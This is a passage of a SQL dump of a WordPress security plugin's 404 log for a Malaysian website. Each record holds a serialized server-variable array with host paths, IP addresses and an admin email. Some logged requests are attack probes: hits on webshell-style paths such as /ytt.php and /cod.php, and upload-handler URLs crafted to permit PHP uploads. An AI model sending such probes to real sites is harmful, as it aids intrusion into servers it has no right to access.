06:44:03',35024896,36837856,'https://bintara.com.my/cod.php',1,0,'193.106.30.99'),(27963,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.66 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"163.172.105.148\";s:11:\"REMOTE_PORT\";s:5:\"54227\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaLkRg7WMZbw-is73DnLswAAAEQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570956358.4629\";s:12:\"REQUEST_TIME\";s:10:\"1570956358\";}}','notice','2019-10-13 08:46:04','2019-10-13 08:45:59',35461240,37273416,'https://bintara.com.my/?page_id=18',1,0,'163.172.105.148'),(27964,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:124:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk%2Fglass-balustrades%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 QIHU 360SE\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:122:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk%2Fglass-balustrades%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"58946\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaLolsy55D9cVEDGHXm5oQAAABM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570957463.1666\";s:12:\"REQUEST_TIME\";s:10:\"1570957463\";}}','notice','2019-10-13 09:04:27','2019-10-13 09:04:23',35425200,37232136,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk%2Fglass-balustrades%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'137.74.4.69'),(27965,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:108:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 QIHU 360SE\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:106:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"59999\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaLoocy55D9cVEDGHXm5pQAAABc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570957474.0733\";s:12:\"REQUEST_TIME\";s:10:\"1570957474\";}}','notice','2019-10-13 09:04:38','2019-10-13 09:04:35',35029896,36835144,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'137.74.4.69'),(27966,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:40:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:34:\"/blog/tag/video-conferencing/feed/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:66:\"Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:56:\"https://bintara.com.my/blog/tag/video-conferencing/feed/\";s:19:\"REDIRECT_SCRIPT_URL\";s:34:\"/blog/tag/video-conferencing/feed/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaLzEw7WMZbw-is73DnP8QAAAE4\";s:12:\"REDIRECT_URL\";s:34:\"/blog/tag/video-conferencing/feed/\";s:11:\"REMOTE_ADDR\";s:12:\"54.36.150.36\";s:11:\"REMOTE_PORT\";s:5:\"22336\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:56:\"https://bintara.com.my/blog/tag/video-conferencing/feed/\";s:10:\"SCRIPT_URL\";s:34:\"/blog/tag/video-conferencing/feed/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaLzEw7WMZbw-is73DnP8QAAAE4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570960147.3188\";s:12:\"REQUEST_TIME\";s:10:\"1570960147\";}}','notice','2019-10-13 09:49:11','2019-10-13 09:49:07',35484192,37297080,'https://bintara.com.my/blog/tag/video-conferencing/feed/',1,0,'54.36.150.36'),(28245,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:132:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 QIHU 360SE/Nutch-1.13\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"107.152.158.217\";s:11:\"REMOTE_PORT\";s:5:\"39724\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XajWBfb4yAloRZFRtQObSAAAAUM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571345925.9981\";s:12:\"REQUEST_TIME\";s:10:\"1571345925\";}}','notice','2019-10-17 20:58:47','2019-10-17 20:58:46',34923552,36726376,'https://bintara.com.my/?page_id=18',1,0,'107.152.158.217'),(28244,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:50:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:8:\"/ytt.php\";s:14:\"CONTENT_LENGTH\";s:2:\"28\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/ytt.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:8:\"/ytt.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XajQIZmA1jUkTR6fHyQ5FAAAAFQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/ytt.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:8:\"/ytt.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XajQIZmA1jUkTR6fHyQ5FAAAAFQ\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"193.106.30.99\";s:11:\"REMOTE_PORT\";s:5:\"45490\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:30:\"https://bintara.com.my/ytt.php\";s:10:\"SCRIPT_URL\";s:8:\"/ytt.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XajQIZmA1jUkTR6fHyQ5FAAAAFQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571344417.1033\";s:12:\"REQUEST_TIME\";s:10:\"1571344417\";}}','notice','2019-10-17 20:33:40','2019-10-17 20:33:37',35362816,37171568,'https://bintara.com.my/ytt.php',1,0,'193.106.30.99'),(28243,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:100:\"/admin_118/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:37:\"text/html, application/xhtml+xml, */*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-CN\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=22ff894fe54a230f1756835d687cbf34\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:12:\"HTTP_REFERER\";s:122:\"http://bintara.com.my//admin_118/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image\";s:15:\"HTTP_USER_AGENT\";s:70:\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:9:\"dir=image\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:21:\"REDIRECT_QUERY_STRING\";s:9:\"dir=image\";s:19:\"REDIRECT_SCRIPT_URI\";s:104:\"https://bintara.com.my/admin_118/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:19:\"REDIRECT_SCRIPT_URL\";s:82:\"/admin_118/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XajLA2xQCXaLINxK9P7gvQAAAMY\";s:12:\"REDIRECT_URL\";s:82:\"/admin_118/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:11:\"49.70.47.85\";s:11:\"REMOTE_PORT\";s:5:\"50413\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:104:\"https://bintara.com.my/admin_118/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:10:\"SCRIPT_URL\";s:82:\"/admin_118/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XajLA2xQCXaLINxK9P7gvQAAAMY\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571343107.9187\";s:12:\"REQUEST_TIME\";s:10:\"1571343107\";}}','notice','2019-10-17 20:11:50','2019-10-17 20:11:48',34935480,36749264,'https://bintara.com.my/admin_118/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image',1,0,'49.70.47.85'),(28240,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:92:\"/a/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:37:\"text/html, application/xhtml+xml, */*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-CN\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=504b270718bb619aed9a32480fefb6f3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:12:\"HTTP_REFERER\";s:114:\"http://bintara.com.my//a/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image\";s:15:\"HTTP_USER_AGENT\";s:70:\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:9:\"dir=image\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:21:\"REDIRECT_QUERY_STRING\";s:9:\"dir=image\";s:19:\"REDIRECT_SCRIPT_URI\";s:96:\"https://bintara.com.my/a/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:19:\"REDIRECT_SCRIPT_URL\";s:74:\"/a/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XajK6vb4yAloRZFRtQOU3QAAAVU\";s:12:\"REDIRECT_URL\";s:74:\"/a/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:11:\"49.70.47.85\";s:11:\"REMOTE_PORT\";s:5:\"49264\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:96:\"https://bintara.com.my/a/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:10:\"SCRIPT_URL\";s:74:\"/a/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XajK6vb4yAloRZFRtQOU3QAAAVU\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571343082.6658\";s:12:\"REQUEST_TIME\";s:10:\"1571343082\";}}','notice','2019-10-17 20:11:24','2019-10-17 20:11:23',34929728,36730080,'https://bintara.com.my/a/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image',1,0,'49.70.47.85'),(28241,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:94:\"/www/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:37:\"text/html, application/xhtml+xml, 